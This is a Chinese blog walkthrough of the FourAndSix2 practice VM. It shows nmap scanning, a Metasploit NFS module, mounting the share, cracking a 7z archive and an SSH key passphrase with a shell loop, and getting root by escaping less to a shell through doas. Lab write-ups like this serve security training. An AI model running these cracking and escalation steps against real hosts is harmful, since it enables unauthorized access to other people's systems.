靶机渗透之FourAndSix2(二)

最新推荐文章于 2023-07-31 23:06:21 发布
最新推荐文章于 2023-07-31 23:06:21 发布
阅读量624 收藏 4
点赞数 1
分类专栏: 靶机渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42111373/article/details/107457588
版权

一、环境准备

一台kali,一台FourAndSix2,能相互ping通

二、靶机发现

1.主机发现,用kali扫描靶机ip地址为192.168.19.156

nmap -sP 192.168.19.0/24

在这里插入图片描述
2.扫描靶机开放了哪些端口

nmap -sV 192.168.19.156

可以发现靶机开放了22 111 2049端口,可以从ssh服务、nfs服务进行入手
在这里插入图片描述

三、渗透过程

1.通过端口服务扫描,首先从nfs服务入手,利用msf的nfs模块

search nfs
use auxiliary/scanner/nfs/nfsmount
set rhosts 192.168.19.156
exploit

在这里插入图片描述
2.通过攻击发现有一个nfs共享目录,kali去挂载这个目录

mount -t nfs 192.168.19.156:/home/user/storage /mnt

3.进入挂载目录发现有一个备份文件,解压发现需要密码,利用rarcrack进行爆破
在这里插入图片描述
爆破:

apt-get install rarcrack
rarcrack --threads 4 --type 7z backup.7z

![在这里插入图片描述](https://img-blog.csdnimg.cn/20200720104719711.png
最终,7z破解脚本成功破解到压缩包密码:chocolate,解压出来发现一堆图片和ssh公、私钥
在这里插入图片描述

4.把公钥复制到/root/.ssh尝试使用ssh私钥登录目标,发现对私钥进行了口令认证

cp id_rsa /root/.ssh/
ssh user@192.168.19.156

在这里插入图片描述

5.使用以下脚本,爆破私钥密码,爆破出12345678

cat /usr/share/wordlists/metasploit/adobe_top100_pass.txt  |while read pass;do if ssh-keygen -c -C "user@forandsix" -P $pass -f id_rsa &>/dev/null;then echo $pass; break; fi; done

在这里插入图片描述
6.进入系统后,收集一些常用信息,查看内核版本,查看id
在这里插入图片描述
在这里插入图片描述

7.查看是否存在可执行的二进制文件,以及带有s标志位的文件
在这里插入图片描述
发现通过find命令我们找到了suid权限运行的程序/usr/bin/doas,它是sudo命令的替代。doas是BSD系列系统下的权限管理工具,类似于Debian系列下的sudo命令

8查看doas.conf,发现当前用户能够以root权限使用less命令查看/var/log/authlog文件,并且不需要输入密码,此时可以通过进入编辑模式(按v),输入/bin/sh获得root权限
在这里插入图片描述
9.执行命令

Doas /usr/bin/less /var/log/authlog

按v,进入编辑模式,输入如下内容
在这里插入图片描述

10.提权成功后,查看/root/flag.txt,即可获得flag
在这里插入图片描述

四、总结

1、信息收集

2、nfs共享资源

3、破解7z压缩文件夹,ssh私钥登录、破解私钥口令

4、OpenBSD类linux系统

5、doas管理工具提权

Deilty
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机FourAndSix2
weixin_43940853的博客
11-06 280
kali : 192.168.230.224 靶机: 192.168.230.215 发现并没有web服务,但是开放了nfs服务 nfs服务主要功能是通过网络让不同的机器系统之间可以彼此共享文件和目录。NFS服务器可以允许NFS客户端将远端NFS服务器端的共享目录挂载到本地的NFS客户端中。 NFS是Network File System的缩写,即网络文件系统。一种使用于分散式文件系统的协定,...
靶机渗透测试(fourandsix2
@小张小张的博客
09-13 721
靶机渗透测试(fourandsix2): Vulnhub靶机 fourandsix2 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(中等) 目标:成功渗透进入靶机,获取root权限并且读取/root/flag.txt 。 渗透流程: 1.探测主机ip(此靶机开机时已经给出) ip:192.68.10.210 2.nmap进行靶机端口服务扫描 22端口: ssh服务 111端口: rpcbind服务 2049端口: nfs服务 发现特殊开放了2
靶机【Vulnhub】FourAndSix2
干铮的博客
10-19 568
FourAndSix2 1.主机发现 靶机给出了网卡ip和网关 还是Nmap ping扫一下 C:\Users\ASUS>Nmap -sP 192.168.43.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-19 10:48 ?D1ú±ê×?ê±?? Nmap scan report for 192.168.43.1 Host is up (0.0070s latency). MAC Address: EC:D0:9F
FourAndSix2 靶机渗透
banacyo14206的博客
09-24 390
0x01 简介 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: https://download.vulnhub.com/fourandsix/FourAndSix2.ova 0x02 信息收集 1.通过存活主机发现,确定目标机器IP 2.端...
02_FourandSix2.01靶机入侵测试完整流程与思路
Hack word
04-12 187
首先有nmap进行信息收集,然后发现开放的22端口ssh服务,另外检收集到nfs文件共享,查看文件共享的信息,发现为everyone所有人可看,利用文件挂载将靶机中的文件挂载到本机,发现问价是一个.7z的压缩包,尝试解压但是压缩文件有密码,根据密码输入错误的解压结果来看发现里面有10个文件,其中八张图片还有一组公私钥,公私钥中可能存在着密码信息,破解压缩包,利用john进行压缩包破解,破解成功后分析文件信息
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub:fourandsix2渗透测试
mandarava的博客
03-11 409
。。。
红队打靶:FourAndSix2.01打靶思路详解(vulnhub)
Bossfrank的博客
07-31 780
本文是vulnhub靶机FourAndSix2.01的详细打靶过程。涉及到的识点包括nfs文件挂载、join破解.7z加密文件、私钥哈希、7z2john/ssh2john工具的使用、less+vim组合利用提权等。靶机的操作系统是OpenBSD,非常规的Linux靶机,值得打靶实操。
FourAndSix: 2.01靶机入侵
渗透测试研究中心
02-12 174
0x01前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: https://download.vulnhub.com/fourandsix/FourAndSix2.ova 0x02信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1....
OSCP - FourAndSix 2.01 的破解
kevinhanser
04-14 1170
本文主要记录对 FourAndSix 2.01 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com 博客集:面向 CTF 的 VM 破解系列 下载链接:FourAndSix 2.01 VM - FourAndSix 2.01 的破解 2019年4月13日19:19:03 【原创】 1. 官方描述 Name: FourAndSix: 2.01 名字: Date rele...
OSCP-Kioptrix2014-3 后渗透测试
weixin_30316097的博客
06-28 228
拿到root权限 之前的努力,最终获得了两个session 尝试看看该操作系统的漏洞 kali: searchsploit freebsd 9.0 cp /usr/share/exploitdb/exploits/freebsd/local/28718.c ./Desktop/ cd Desktop/ nc -lp 5656 < 28718.c -q 1 msf ...
kali下敏感目录扫描工具Nikto使用
热门推荐
大方子
07-23 1万+
NIkto介绍(来自百度百科) Nikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件/CGIs;超过625种服务器版本;超过230种特定服务器问题。扫描项和插件可以自动更新(如果需要)。基于Whisker/libwhisker完成其底层功能。这是一款非常棒的工具,但其软件本身并不经常更新,最新和最危险的可能检测不到。 ...
Vulnhub靶机 FourAndSix1
菜浪马废的博客
09-16 171
挂载/shared 里面有个.img文件 挂载到/usb 看见一堆图片
DC-1靶机练习
千寻的博客
12-31 1574
DC-1靶机练习 第一步:搭建dc-1 和 kali虚拟机,都要nat模式 [mkdir dc-1] [cd dc-1/] 第步:扫描出靶机的ip地址 [kali—192.168.139.143/24 ] [nmap -sP 192.168.139.0/24 -oN nmap.sp] [-sP/-sn 不进行端口扫描] [-oN/-oX ...
自动获取flag
zheng_ruiguo的专栏
04-23 1051
''' scanFlag.py 自动获取flag by 郑瑞国 ''' import paramiko import webbrowser import threading import time def webConnect(ip): webbrowser.open('http://'+ip+'/html/WebShell.php') time.sleep(0.5) def...
hackbox靶机渗透
最新发布
10-15
2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值